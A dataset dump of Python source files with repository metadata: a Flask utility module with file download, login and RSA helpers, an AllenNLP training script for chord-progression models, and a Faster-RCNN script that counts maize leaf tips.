raises(TypeError, range, "42")
none
1
2.944371
3
common/libs/utils.py
WengChaoxi/flask-mvc
1
6618620
<reponame>WengChaoxi/flask-mvc<filename>common/libs/utils.py # coding: utf-8 from flask import request, session, redirect, url_for, send_file, make_response #,jsonify from functools import wraps import json, platform, requests, rsa def handleData(): try: # data = request.get_data() # 获取前端数据 # data = str(data, 'utf-8') # 转utf-8 # data = json.loads(data) # json转字典 data = json.loads(request.get_data().decode("utf-8"), strict=False) # if data is None: # data = request.form.to_dic() # elif data is None: # data = json.loads(request.args().decode("utf-8"), strict=False) if data is None: data ={} return data except: return {} def msg(status_code, data=None, msg=None): data_dic = { 'code': status_code, } if data: data_dic['data'] = data if msg: data_dic['msg'] = msg # return jsonify(data_dic) return json.dumps(data_dic, ensure_ascii=False) def correctPath(path=''): slash = '/' # Linux路径分割 if platform.system() == 'Windows': slash = r'\\' path.replace('/', slash) elif platform.system() == 'Linux': path.replace(r'\\', slash) return path ''' def bytes2human(n): symbols = ('K','M','G','T','P','E','Z','Y') prefix = {} for i,s in enumerate(symbols): prefix[s] = 1<<(i+1)*10 for s in reversed(symbols): if n >= prefix[s]: value = float(n)/prefix[s] return '%.2f%s'%(value,s) return '%.2fB'%(n) ''' from math import log def bytes2human(n): if n==0: return '0.00B' symbols = ('B','K','M','G','T','P','E','Z','Y') index = int(log(n,2)//10) return '%.2f%s'%(float(n)/(1<<index*10), symbols[index]) def fileResponse(file_path, file_name=None): if not file_name: file_name = file_path.split(correctPath('/'))[-1] response = make_response(send_file(file_path)) # , as_attachment=True, attachment_filename='data.file')) response.headers["Cache-Control"] = "max-age=43200" response.headers["Content-Type"] = "application/octet-stream" from urllib import parse file_urlencode = parse.quote(file_name.encode('utf-8')) # 对中文进行URL编码 response.headers["Content-Disposition"] = "attachment; filename*=utf-8''%s" % 
(file_urlencode) # response.headers["Content-Length"] = "%d"%total_size return response def login_limit(func): # 装饰器:参数和返回值都是函数 @wraps(func) def inner(*args, **kwargs): if session.get('account'): return func(*args, **kwargs) else: return redirect(url_for('api_user.login')) return inner def getOpenid(code): if code: app_id = '' app_secret = '' req_params = { 'appid':app_id, 'secret':app_secret, 'js_code':code, 'grant_type': 'authorization_code' } wx_login_api = 'https://api.weixin.qq.com/sns/jscode2session' response = requests.get(wx_login_api, params=req_params) openid = response.json().get('openid') # 得到用户关于当前小程序的OpenID if openid: # session_key = data['session_key'] # return (openid, session_key) return openid return None def docResponse(path): resp = make_response(open(path).read()) resp.headers['Content-type'] = "application/json;charset=UTF-8" return resp class Rsa(): # def __init__(self, public_key=None, private_key=None): # self.public_key = public_key # self.private_key = private_key # def createRsaKeysPem(self, public_pem_save_path='./public_key.pem', private_pem_save_path='./private_key.pem', bytes=2048): # (pub_key, pri_key) = rsa.newkeys(bytes) # with open(public_pem_save_path, 'wb+') as f: # f.write(pub_key.save_pkcs1('PEM')) # with open(private_pem_save_path, 'wb+') as f: # f.write(pri_key.save_pkcs1('PEM')) # return (pub_key, pri_key) def fromPemLoadRsaPubKey(self, path): with open(path, 'rb') as f: pem = f.read() self.public_key = rsa.PublicKey.load_pkcs1(pem) return self.public_key # def fromPemLoadRsaPriKey(self, path): # with open(path, 'rb') as f: # pem = f.read() # self.private_key = rsa.PrivateKey.load_pkcs1(pem) # return self.private_key def encrypt(self, data, public_key=None): if public_key is None: public_key = self.public_key return rsa.encrypt(data, public_key) # def decrypt(self, data, private_key=None): # if private_key is None: # private_key = self.private_key # return rsa.decrypt(data, private_key) _rsa = Rsa()
# coding: utf-8 from flask import request, session, redirect, url_for, send_file, make_response #,jsonify from functools import wraps import json, platform, requests, rsa def handleData(): try: # data = request.get_data() # 获取前端数据 # data = str(data, 'utf-8') # 转utf-8 # data = json.loads(data) # json转字典 data = json.loads(request.get_data().decode("utf-8"), strict=False) # if data is None: # data = request.form.to_dic() # elif data is None: # data = json.loads(request.args().decode("utf-8"), strict=False) if data is None: data ={} return data except: return {} def msg(status_code, data=None, msg=None): data_dic = { 'code': status_code, } if data: data_dic['data'] = data if msg: data_dic['msg'] = msg # return jsonify(data_dic) return json.dumps(data_dic, ensure_ascii=False) def correctPath(path=''): slash = '/' # Linux路径分割 if platform.system() == 'Windows': slash = r'\\' path.replace('/', slash) elif platform.system() == 'Linux': path.replace(r'\\', slash) return path ''' def bytes2human(n): symbols = ('K','M','G','T','P','E','Z','Y') prefix = {} for i,s in enumerate(symbols): prefix[s] = 1<<(i+1)*10 for s in reversed(symbols): if n >= prefix[s]: value = float(n)/prefix[s] return '%.2f%s'%(value,s) return '%.2fB'%(n) ''' from math import log def bytes2human(n): if n==0: return '0.00B' symbols = ('B','K','M','G','T','P','E','Z','Y') index = int(log(n,2)//10) return '%.2f%s'%(float(n)/(1<<index*10), symbols[index]) def fileResponse(file_path, file_name=None): if not file_name: file_name = file_path.split(correctPath('/'))[-1] response = make_response(send_file(file_path)) # , as_attachment=True, attachment_filename='data.file')) response.headers["Cache-Control"] = "max-age=43200" response.headers["Content-Type"] = "application/octet-stream" from urllib import parse file_urlencode = parse.quote(file_name.encode('utf-8')) # 对中文进行URL编码 response.headers["Content-Disposition"] = "attachment; filename*=utf-8''%s" % (file_urlencode) # response.headers["Content-Length"] = 
"%d"%total_size return response def login_limit(func): # 装饰器:参数和返回值都是函数 @wraps(func) def inner(*args, **kwargs): if session.get('account'): return func(*args, **kwargs) else: return redirect(url_for('api_user.login')) return inner def getOpenid(code): if code: app_id = '' app_secret = '' req_params = { 'appid':app_id, 'secret':app_secret, 'js_code':code, 'grant_type': 'authorization_code' } wx_login_api = 'https://api.weixin.qq.com/sns/jscode2session' response = requests.get(wx_login_api, params=req_params) openid = response.json().get('openid') # 得到用户关于当前小程序的OpenID if openid: # session_key = data['session_key'] # return (openid, session_key) return openid return None def docResponse(path): resp = make_response(open(path).read()) resp.headers['Content-type'] = "application/json;charset=UTF-8" return resp class Rsa(): # def __init__(self, public_key=None, private_key=None): # self.public_key = public_key # self.private_key = private_key # def createRsaKeysPem(self, public_pem_save_path='./public_key.pem', private_pem_save_path='./private_key.pem', bytes=2048): # (pub_key, pri_key) = rsa.newkeys(bytes) # with open(public_pem_save_path, 'wb+') as f: # f.write(pub_key.save_pkcs1('PEM')) # with open(private_pem_save_path, 'wb+') as f: # f.write(pri_key.save_pkcs1('PEM')) # return (pub_key, pri_key) def fromPemLoadRsaPubKey(self, path): with open(path, 'rb') as f: pem = f.read() self.public_key = rsa.PublicKey.load_pkcs1(pem) return self.public_key # def fromPemLoadRsaPriKey(self, path): # with open(path, 'rb') as f: # pem = f.read() # self.private_key = rsa.PrivateKey.load_pkcs1(pem) # return self.private_key def encrypt(self, data, public_key=None): if public_key is None: public_key = self.public_key return rsa.encrypt(data, public_key) # def decrypt(self, data, private_key=None): # if private_key is None: # private_key = self.private_key # return rsa.decrypt(data, private_key) _rsa = Rsa()
en
0.318345
# coding: utf-8 #,jsonify # data = request.get_data() # 获取前端数据 # data = str(data, 'utf-8') # 转utf-8 # data = json.loads(data) # json转字典 # if data is None: # data = request.form.to_dic() # elif data is None: # data = json.loads(request.args().decode("utf-8"), strict=False) # return jsonify(data_dic) # Linux路径分割 def bytes2human(n): symbols = ('K','M','G','T','P','E','Z','Y') prefix = {} for i,s in enumerate(symbols): prefix[s] = 1<<(i+1)*10 for s in reversed(symbols): if n >= prefix[s]: value = float(n)/prefix[s] return '%.2f%s'%(value,s) return '%.2fB'%(n) # , as_attachment=True, attachment_filename='data.file')) # 对中文进行URL编码 # response.headers["Content-Length"] = "%d"%total_size # 装饰器:参数和返回值都是函数 # 得到用户关于当前小程序的OpenID # session_key = data['session_key'] # return (openid, session_key) # def __init__(self, public_key=None, private_key=None): # self.public_key = public_key # self.private_key = private_key # def createRsaKeysPem(self, public_pem_save_path='./public_key.pem', private_pem_save_path='./private_key.pem', bytes=2048): # (pub_key, pri_key) = rsa.newkeys(bytes) # with open(public_pem_save_path, 'wb+') as f: # f.write(pub_key.save_pkcs1('PEM')) # with open(private_pem_save_path, 'wb+') as f: # f.write(pri_key.save_pkcs1('PEM')) # return (pub_key, pri_key) # def fromPemLoadRsaPriKey(self, path): # with open(path, 'rb') as f: # pem = f.read() # self.private_key = rsa.PrivateKey.load_pkcs1(pem) # return self.private_key # def decrypt(self, data, private_key=None): # if private_key is None: # private_key = self.private_key # return rsa.decrypt(data, private_key)
2.623402
3
src/baxter_learning/src/baxter_hw_env/baxter_hw_env/envs/__init__.py
calhwd15508/106B-Project1
3
6618621
<gh_stars>1-10 #from quadrotor_14d_hw_env.envs.quadrotor_14d_hw_env import Quadrotor14dHwEnv from baxter_hw_env import BaxterHwEnv
#from quadrotor_14d_hw_env.envs.quadrotor_14d_hw_env import Quadrotor14dHwEnv from baxter_hw_env import BaxterHwEnv
ca
0.104413
#from quadrotor_14d_hw_env.envs.quadrotor_14d_hw_env import Quadrotor14dHwEnv
1.04539
1
main.py
kienvu58/chord-progression-modeling
0
6618622
<reponame>kienvu58/chord-progression-modeling import torch import torch.optim as optim import numpy as np import shutil import itertools import json import time import math from generate_vocabulary import generate_vocab from generate_similarity_target import generate_target from modules.tokenizers import ChordCharacterTokenizer, NoteTokenizer from modules.dataset_readers import CpmDatasetReader from modules.chord_progression_models import Cpm from modules.predictors import Predictor from allennlp.training.learning_rate_schedulers import CosineWithRestarts from allennlp.data.vocabulary import Vocabulary from allennlp.modules.text_field_embedders import ( TextFieldEmbedder, BasicTextFieldEmbedder, ) from allennlp.modules.token_embedders import Embedding, TokenCharactersEncoder from allennlp.modules.seq2vec_encoders import ( AugmentedLstm, BagOfEmbeddingsEncoder, CnnEncoder, CnnHighwayEncoder, PytorchSeq2VecWrapper, ) from allennlp.modules.seq2seq_encoders import ( Seq2SeqEncoder, PytorchSeq2SeqWrapper, IntraSentenceAttentionEncoder, StackedSelfAttentionEncoder, ) from allennlp.modules.similarity_functions import MultiHeadedSimilarity from allennlp.common.file_utils import cached_path from allennlp.data.iterators import BucketIterator from allennlp.data.token_indexers import ( TokenIndexer, SingleIdTokenIndexer, TokenCharactersIndexer, ) from allennlp.training.trainer import Trainer import logging import sys import os logging.basicConfig(stream=sys.stdout, level=logging.INFO) torch.manual_seed(1) if not os.path.isdir("logs/tmp"): os.makedirs("logs/tmp") def run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams): log = {} log["name"] = "{} {} {} {}".format( rnn_type, embedding_type, "similarity_target" if use_similarity_targets else "hard_target", hparams["update_targets"] ) vocab = Vocabulary().from_files(hparams["vocab_path"]) if embedding_type == "Chord": # data reader reader = CpmDatasetReader() # chord embedder token_embedding = Embedding( 
num_embeddings=vocab.get_vocab_size("tokens"), embedding_dim=hparams["chord_token_embedding_dim"], ) chord_embedder = BasicTextFieldEmbedder({"tokens": token_embedding}) elif embedding_type == "Note": # data reader note_tokenizer = NoteTokenizer() note_indexer = TokenCharactersIndexer( namespace="notes", min_padding_length=4, character_tokenizer=note_tokenizer ) reader = CpmDatasetReader( token_indexers={"tokens": SingleIdTokenIndexer(), "notes": note_indexer} ) # chord embedder token_embedding = Embedding( num_embeddings=vocab.get_vocab_size("tokens"), embedding_dim=hparams["chord_token_embedding_dim"], ) note_token_embedding = Embedding( vocab.get_vocab_size("notes"), hparams["note_embedding_dim"] ) note_encoder = CnnEncoder( num_filters=hparams["cnn_encoder_num_filters"], ngram_filter_sizes=hparams["cnn_encoder_n_gram_filter_sizes"], embedding_dim=hparams["note_embedding_dim"], output_dim=hparams["note_level_embedding_dim"], ) note_embedding = TokenCharactersEncoder( note_token_embedding, note_encoder) chord_embedder = BasicTextFieldEmbedder( {"tokens": token_embedding, "notes": note_embedding} ) else: raise ValueError("Unknown embedding type:", embedding_type) # read data train_dataset = reader.read(os.path.join( hparams["data_path"], "train.txt")) val_dataset = reader.read(os.path.join(hparams["data_path"], "val.txt")) test_dataset = reader.read(os.path.join(hparams["data_path"], "test.txt")) # contextualizer contextual_input_dim = chord_embedder.get_output_dim() if rnn_type == "RNN": contextualizer = PytorchSeq2SeqWrapper( torch.nn.RNN( contextual_input_dim, hparams["rnn_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "LSTM": contextualizer = PytorchSeq2SeqWrapper( torch.nn.LSTM( contextual_input_dim, hparams["lstm_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "GRU": contextualizer = PytorchSeq2SeqWrapper( torch.nn.GRU( contextual_input_dim, hparams["gru_hidden_dim"], batch_first=True, bidirectional=False ) 
) else: raise ValueError("Unknown rnn type:", rnn_type) if use_similarity_targets: vocab_size = vocab.get_vocab_size("tokens") similarity_targets = Embedding( num_embeddings=vocab_size, embedding_dim=vocab_size, weight=torch.load(hparams["similarity_target_path"]), trainable=False, ) else: similarity_targets = None iterator = BucketIterator( batch_size=hparams["batch_size"], sorting_keys=[ ("input_tokens", "num_tokens")] ) iterator.index_with(vocab) batches_per_epoch = math.ceil(len(train_dataset) / hparams["batch_size"]) model_hparams = { "dropout": None, "similarity_targets": similarity_targets, "update_targets": hparams["update_targets"], "T_initial": hparams["T_initial"], "decay_rate": hparams["decay_rate"], "batches_per_epoch": batches_per_epoch, "fc_hidden_dim": hparams["fc_hidden_dim"] } # chord progression model model = Cpm( vocab, chord_embedder, contextualizer, model_hparams ) if torch.cuda.is_available(): cuda_device = 0 model = model.cuda(cuda_device) print("GPU available.") else: cuda_device = -1 optimizer = optim.Adam(model.parameters(), lr=hparams["lr"]) ts = time.gmtime() saved_model_path = os.path.join( hparams["saved_model_path"], time.strftime("%Y-%m-%d %H-%M-%S", ts)) serialization_dir = os.path.join(saved_model_path, "checkpoints") trainer = Trainer( model=model, optimizer=optimizer, iterator=iterator, train_dataset=train_dataset, validation_dataset=val_dataset, serialization_dir=serialization_dir, patience=hparams["patience"], num_epochs=hparams["num_epochs"], cuda_device=cuda_device, ) trainer.train() saved_model_path = os.path.join( saved_model_path, "{}.th".format(log["name"])) torch.save(model.state_dict(), saved_model_path) predictor = Predictor(model=model, iterator=iterator, cuda_device=cuda_device) pred_metrics = predictor.predict(test_dataset) log["metrics"] = pred_metrics log["saved_mode_path"] = saved_model_path return log def main(hparams): if not os.path.isdir("logs/tmp/"): os.makedirs("logs/tmp/") similarity_target_path = 
hparams["similarity_target_path"] embedding_type_list = ["Chord"] rnn_type_list = ["LSTM", "GRU", "RNN"] use_similarity_targets = hparams["use_similarity_targets"] result = {} result["similarity_target"] = similarity_target_path if use_similarity_targets else None result["experiments"] = [] for embedding_type, rnn_type in itertools.product( embedding_type_list, rnn_type_list ): log = run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams) result["experiments"].append(log) with open(os.path.join("logs", "tmp", "{} {}.json".format(log["name"], time.time())), "w") as f: json.dump(log, f, indent=4) result["hparams"] = hparams ts = time.gmtime() result_fn = "st={}, T0={}, lambda={}, time={}.json".format( similarity_target, T_initial, decay_rate, time.strftime("%Y-%m-%d %H-%M-%S", ts)) with open(os.path.join("logs", result_fn), "w") as f: json.dump(result, f, indent=4) if __name__ == "__main__": if not os.path.isdir("data/vocabulary/"): generate_vocab() similarity_target_list = [("distance_2", False)] for st, _ in similarity_target_list: if st is None: continue if not os.path.exists("data/targets/target_{}.th".format(st)): if "-" in st: weight_set = st.split("-") weight_set = [int(w) for w in weight_set] generate_target(weight_set) else: print("Target {} is not found!".format(st)) exit() T_initial_list = [0.05] decay_rate_list = [0.001] data_fold_list = [0, 1, 2, 3, 4] for data_fold, similarity_target, T_initial, decay_rate in itertools.product(data_fold_list, similarity_target_list, T_initial_list, decay_rate_list): data_path = "data/cv/{}/".format(data_fold) vocab_path = "data/vocabulary/" saved_model_path = "saved_models/" similarity_target_path = "data/targets/target_{}.th".format( similarity_target[0]) hparams = { "lr": 0.001, "batch_size": 32, "num_epochs": 200, "patience": 10, "rnn_hidden_dim": 128, "lstm_hidden_dim": 128, "gru_hidden_dim": 128, "fc_hidden_dim": 128, "chord_token_embedding_dim": 128, "note_embedding_dim": 64, 
"note_level_embedding_dim": 64, "cnn_encoder_num_filters": 16, "cnn_encoder_n_gram_filter_sizes": (2, 3, 4), "similarity_target_path": similarity_target_path, "update_targets": similarity_target[1], "T_initial": T_initial, "decay_rate": decay_rate, "data_path": data_path, "vocab_path": vocab_path, "saved_model_path": saved_model_path, "use_similarity_targets": True if similarity_target else False } main(hparams)
import torch import torch.optim as optim import numpy as np import shutil import itertools import json import time import math from generate_vocabulary import generate_vocab from generate_similarity_target import generate_target from modules.tokenizers import ChordCharacterTokenizer, NoteTokenizer from modules.dataset_readers import CpmDatasetReader from modules.chord_progression_models import Cpm from modules.predictors import Predictor from allennlp.training.learning_rate_schedulers import CosineWithRestarts from allennlp.data.vocabulary import Vocabulary from allennlp.modules.text_field_embedders import ( TextFieldEmbedder, BasicTextFieldEmbedder, ) from allennlp.modules.token_embedders import Embedding, TokenCharactersEncoder from allennlp.modules.seq2vec_encoders import ( AugmentedLstm, BagOfEmbeddingsEncoder, CnnEncoder, CnnHighwayEncoder, PytorchSeq2VecWrapper, ) from allennlp.modules.seq2seq_encoders import ( Seq2SeqEncoder, PytorchSeq2SeqWrapper, IntraSentenceAttentionEncoder, StackedSelfAttentionEncoder, ) from allennlp.modules.similarity_functions import MultiHeadedSimilarity from allennlp.common.file_utils import cached_path from allennlp.data.iterators import BucketIterator from allennlp.data.token_indexers import ( TokenIndexer, SingleIdTokenIndexer, TokenCharactersIndexer, ) from allennlp.training.trainer import Trainer import logging import sys import os logging.basicConfig(stream=sys.stdout, level=logging.INFO) torch.manual_seed(1) if not os.path.isdir("logs/tmp"): os.makedirs("logs/tmp") def run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams): log = {} log["name"] = "{} {} {} {}".format( rnn_type, embedding_type, "similarity_target" if use_similarity_targets else "hard_target", hparams["update_targets"] ) vocab = Vocabulary().from_files(hparams["vocab_path"]) if embedding_type == "Chord": # data reader reader = CpmDatasetReader() # chord embedder token_embedding = Embedding( num_embeddings=vocab.get_vocab_size("tokens"), 
embedding_dim=hparams["chord_token_embedding_dim"], ) chord_embedder = BasicTextFieldEmbedder({"tokens": token_embedding}) elif embedding_type == "Note": # data reader note_tokenizer = NoteTokenizer() note_indexer = TokenCharactersIndexer( namespace="notes", min_padding_length=4, character_tokenizer=note_tokenizer ) reader = CpmDatasetReader( token_indexers={"tokens": SingleIdTokenIndexer(), "notes": note_indexer} ) # chord embedder token_embedding = Embedding( num_embeddings=vocab.get_vocab_size("tokens"), embedding_dim=hparams["chord_token_embedding_dim"], ) note_token_embedding = Embedding( vocab.get_vocab_size("notes"), hparams["note_embedding_dim"] ) note_encoder = CnnEncoder( num_filters=hparams["cnn_encoder_num_filters"], ngram_filter_sizes=hparams["cnn_encoder_n_gram_filter_sizes"], embedding_dim=hparams["note_embedding_dim"], output_dim=hparams["note_level_embedding_dim"], ) note_embedding = TokenCharactersEncoder( note_token_embedding, note_encoder) chord_embedder = BasicTextFieldEmbedder( {"tokens": token_embedding, "notes": note_embedding} ) else: raise ValueError("Unknown embedding type:", embedding_type) # read data train_dataset = reader.read(os.path.join( hparams["data_path"], "train.txt")) val_dataset = reader.read(os.path.join(hparams["data_path"], "val.txt")) test_dataset = reader.read(os.path.join(hparams["data_path"], "test.txt")) # contextualizer contextual_input_dim = chord_embedder.get_output_dim() if rnn_type == "RNN": contextualizer = PytorchSeq2SeqWrapper( torch.nn.RNN( contextual_input_dim, hparams["rnn_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "LSTM": contextualizer = PytorchSeq2SeqWrapper( torch.nn.LSTM( contextual_input_dim, hparams["lstm_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "GRU": contextualizer = PytorchSeq2SeqWrapper( torch.nn.GRU( contextual_input_dim, hparams["gru_hidden_dim"], batch_first=True, bidirectional=False ) ) else: raise ValueError("Unknown rnn type:", 
rnn_type) if use_similarity_targets: vocab_size = vocab.get_vocab_size("tokens") similarity_targets = Embedding( num_embeddings=vocab_size, embedding_dim=vocab_size, weight=torch.load(hparams["similarity_target_path"]), trainable=False, ) else: similarity_targets = None iterator = BucketIterator( batch_size=hparams["batch_size"], sorting_keys=[ ("input_tokens", "num_tokens")] ) iterator.index_with(vocab) batches_per_epoch = math.ceil(len(train_dataset) / hparams["batch_size"]) model_hparams = { "dropout": None, "similarity_targets": similarity_targets, "update_targets": hparams["update_targets"], "T_initial": hparams["T_initial"], "decay_rate": hparams["decay_rate"], "batches_per_epoch": batches_per_epoch, "fc_hidden_dim": hparams["fc_hidden_dim"] } # chord progression model model = Cpm( vocab, chord_embedder, contextualizer, model_hparams ) if torch.cuda.is_available(): cuda_device = 0 model = model.cuda(cuda_device) print("GPU available.") else: cuda_device = -1 optimizer = optim.Adam(model.parameters(), lr=hparams["lr"]) ts = time.gmtime() saved_model_path = os.path.join( hparams["saved_model_path"], time.strftime("%Y-%m-%d %H-%M-%S", ts)) serialization_dir = os.path.join(saved_model_path, "checkpoints") trainer = Trainer( model=model, optimizer=optimizer, iterator=iterator, train_dataset=train_dataset, validation_dataset=val_dataset, serialization_dir=serialization_dir, patience=hparams["patience"], num_epochs=hparams["num_epochs"], cuda_device=cuda_device, ) trainer.train() saved_model_path = os.path.join( saved_model_path, "{}.th".format(log["name"])) torch.save(model.state_dict(), saved_model_path) predictor = Predictor(model=model, iterator=iterator, cuda_device=cuda_device) pred_metrics = predictor.predict(test_dataset) log["metrics"] = pred_metrics log["saved_mode_path"] = saved_model_path return log def main(hparams): if not os.path.isdir("logs/tmp/"): os.makedirs("logs/tmp/") similarity_target_path = hparams["similarity_target_path"] embedding_type_list 
= ["Chord"] rnn_type_list = ["LSTM", "GRU", "RNN"] use_similarity_targets = hparams["use_similarity_targets"] result = {} result["similarity_target"] = similarity_target_path if use_similarity_targets else None result["experiments"] = [] for embedding_type, rnn_type in itertools.product( embedding_type_list, rnn_type_list ): log = run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams) result["experiments"].append(log) with open(os.path.join("logs", "tmp", "{} {}.json".format(log["name"], time.time())), "w") as f: json.dump(log, f, indent=4) result["hparams"] = hparams ts = time.gmtime() result_fn = "st={}, T0={}, lambda={}, time={}.json".format( similarity_target, T_initial, decay_rate, time.strftime("%Y-%m-%d %H-%M-%S", ts)) with open(os.path.join("logs", result_fn), "w") as f: json.dump(result, f, indent=4) if __name__ == "__main__": if not os.path.isdir("data/vocabulary/"): generate_vocab() similarity_target_list = [("distance_2", False)] for st, _ in similarity_target_list: if st is None: continue if not os.path.exists("data/targets/target_{}.th".format(st)): if "-" in st: weight_set = st.split("-") weight_set = [int(w) for w in weight_set] generate_target(weight_set) else: print("Target {} is not found!".format(st)) exit() T_initial_list = [0.05] decay_rate_list = [0.001] data_fold_list = [0, 1, 2, 3, 4] for data_fold, similarity_target, T_initial, decay_rate in itertools.product(data_fold_list, similarity_target_list, T_initial_list, decay_rate_list): data_path = "data/cv/{}/".format(data_fold) vocab_path = "data/vocabulary/" saved_model_path = "saved_models/" similarity_target_path = "data/targets/target_{}.th".format( similarity_target[0]) hparams = { "lr": 0.001, "batch_size": 32, "num_epochs": 200, "patience": 10, "rnn_hidden_dim": 128, "lstm_hidden_dim": 128, "gru_hidden_dim": 128, "fc_hidden_dim": 128, "chord_token_embedding_dim": 128, "note_embedding_dim": 64, "note_level_embedding_dim": 64, "cnn_encoder_num_filters": 16, 
"cnn_encoder_n_gram_filter_sizes": (2, 3, 4), "similarity_target_path": similarity_target_path, "update_targets": similarity_target[1], "T_initial": T_initial, "decay_rate": decay_rate, "data_path": data_path, "vocab_path": vocab_path, "saved_model_path": saved_model_path, "use_similarity_targets": True if similarity_target else False } main(hparams)
en
0.454215
# data reader # chord embedder # data reader # chord embedder # read data # contextualizer # chord progression model
1.861912
2
CountingByDetection_FasterRCNNs/predict.py
huskermiao/MaizeLeafCounting
5
6618623
<reponame>huskermiao/MaizeLeafCounting<filename>CountingByDetection_FasterRCNNs/predict.py # -*- coding: UTF-8 -*- """ Detect leaf tips using a trained Faster-RCNN """ import os import time import datetime import argparse import numpy as np import pandas as pd from pathlib import Path import torch import utils from torch.utils.data import DataLoader from base import ObjectDetectionDataset, get_model, show_box, get_transform from engine import train_one_epoch, evaluate, idx_cleanboxes parser = argparse.ArgumentParser(description='Training CNNs', formatter_class=argparse.ArgumentDefaultsHelpFormatter) # required arguments parser.add_argument('model_fn', help='specify the filename of the trained model') parser.add_argument('testing_csv', help='tab separated csv file for testing') parser.add_argument('testing_img_dir', help='directory where testing images reside') parser.add_argument('output_prefix', help='the prefix of output files') # positional arguments parser.add_argument('--score_cutoff', type=float, default=0.5, help='set score cutoff') parser.add_argument('--second_cutoff', type=float, default=0.83, help='cutoff for solving overlapped bounding boxes') args = parser.parse_args() def predict(args): saved_model, test_csv, test_dir, output_prefix = args.model_fn, args.testing_csv, args.testing_img_dir, args.output_prefix device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print(f'device detected: {device}') model = get_model(num_classes=3) model.load_state_dict(torch.load(saved_model, map_location=device)) model.eval() test_dataset = ObjectDetectionDataset(test_csv, test_dir, get_transform(train=False), only_image=True, sep=',') test_loader = DataLoader(test_dataset, batch_size=1) filenames, lcs = [], [] # lcs: leaf counts print('start prediction...') for imgs, _, fns in test_loader: imgs = imgs.to(device) results = model(imgs) fn = fns[0] print(fn) boxes, labels, scores = results[0]['boxes'], results[0]['labels'], results[0]['scores'] boxes = 
np.array([i.to(device).tolist() for i in boxes]) labels = np.array([i.to(device).tolist() for i in labels]) scores = np.array([i.to(device).tolist() for i in scores]) idxs = np.argwhere(scores>args.score_cutoff).squeeze() boxes, labels, scores = boxes[idxs], labels[idxs], scores[idxs] # post-process boxes to remvoe redundancy final_idx = idx_cleanboxes(boxes, scores, second_cutoff=args.second_cutoff) boxes, labels, scores = boxes[final_idx], labels[final_idx], scores[final_idx] print('saving box coordinates, label, and score...') npy_prefix = '.'.join(fn.split('.')[0:-1]) df = pd.DataFrame(boxes) df.columns = ['x0', 'y0', 'x1', 'y1'] df['label'] = labels df['score'] = scores df.to_csv(npy_prefix+'.info.csv', index=False) print('adding predicted box on the original images...') img = show_box(Path(test_dir)/fn, boxes, labels, scores) img_out_fn = fn.replace('.png', '.prd.jpg') if fn.endswith('.png') else fn.replace('.jpg', '.prd.jpg') img.save(img_out_fn) filenames.append(fn) lcs.append(len(final_idx)) pd.DataFrame(dict(zip(['fn', 'lc'], [filenames, lcs]))).to_csv(output_prefix+'.prediction.csv', index=False) print('Done! check leaf counting results in %s.prediction.csv'%output_prefix) if __name__ == "__main__": predict(args)
# -*- coding: UTF-8 -*- """ Detect leaf tips using a trained Faster-RCNN """ import os import time import datetime import argparse import numpy as np import pandas as pd from pathlib import Path import torch import utils from torch.utils.data import DataLoader from base import ObjectDetectionDataset, get_model, show_box, get_transform from engine import train_one_epoch, evaluate, idx_cleanboxes parser = argparse.ArgumentParser(description='Training CNNs', formatter_class=argparse.ArgumentDefaultsHelpFormatter) # required arguments parser.add_argument('model_fn', help='specify the filename of the trained model') parser.add_argument('testing_csv', help='tab separated csv file for testing') parser.add_argument('testing_img_dir', help='directory where testing images reside') parser.add_argument('output_prefix', help='the prefix of output files') # positional arguments parser.add_argument('--score_cutoff', type=float, default=0.5, help='set score cutoff') parser.add_argument('--second_cutoff', type=float, default=0.83, help='cutoff for solving overlapped bounding boxes') args = parser.parse_args() def predict(args): saved_model, test_csv, test_dir, output_prefix = args.model_fn, args.testing_csv, args.testing_img_dir, args.output_prefix device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print(f'device detected: {device}') model = get_model(num_classes=3) model.load_state_dict(torch.load(saved_model, map_location=device)) model.eval() test_dataset = ObjectDetectionDataset(test_csv, test_dir, get_transform(train=False), only_image=True, sep=',') test_loader = DataLoader(test_dataset, batch_size=1) filenames, lcs = [], [] # lcs: leaf counts print('start prediction...') for imgs, _, fns in test_loader: imgs = imgs.to(device) results = model(imgs) fn = fns[0] print(fn) boxes, labels, scores = results[0]['boxes'], results[0]['labels'], results[0]['scores'] boxes = np.array([i.to(device).tolist() for i in boxes]) labels = np.array([i.to(device).tolist() 
for i in labels]) scores = np.array([i.to(device).tolist() for i in scores]) idxs = np.argwhere(scores>args.score_cutoff).squeeze() boxes, labels, scores = boxes[idxs], labels[idxs], scores[idxs] # post-process boxes to remvoe redundancy final_idx = idx_cleanboxes(boxes, scores, second_cutoff=args.second_cutoff) boxes, labels, scores = boxes[final_idx], labels[final_idx], scores[final_idx] print('saving box coordinates, label, and score...') npy_prefix = '.'.join(fn.split('.')[0:-1]) df = pd.DataFrame(boxes) df.columns = ['x0', 'y0', 'x1', 'y1'] df['label'] = labels df['score'] = scores df.to_csv(npy_prefix+'.info.csv', index=False) print('adding predicted box on the original images...') img = show_box(Path(test_dir)/fn, boxes, labels, scores) img_out_fn = fn.replace('.png', '.prd.jpg') if fn.endswith('.png') else fn.replace('.jpg', '.prd.jpg') img.save(img_out_fn) filenames.append(fn) lcs.append(len(final_idx)) pd.DataFrame(dict(zip(['fn', 'lc'], [filenames, lcs]))).to_csv(output_prefix+'.prediction.csv', index=False) print('Done! check leaf counting results in %s.prediction.csv'%output_prefix) if __name__ == "__main__": predict(args)
en
0.434715
# -*- coding: UTF-8 -*- Detect leaf tips using a trained Faster-RCNN # required arguments # positional arguments # lcs: leaf counts # post-process boxes to remvoe redundancy
2.574214
3
yolov4_pytorch/utils/prune.py
Lornatang/YOLOv4-PyTorch
19
6618624
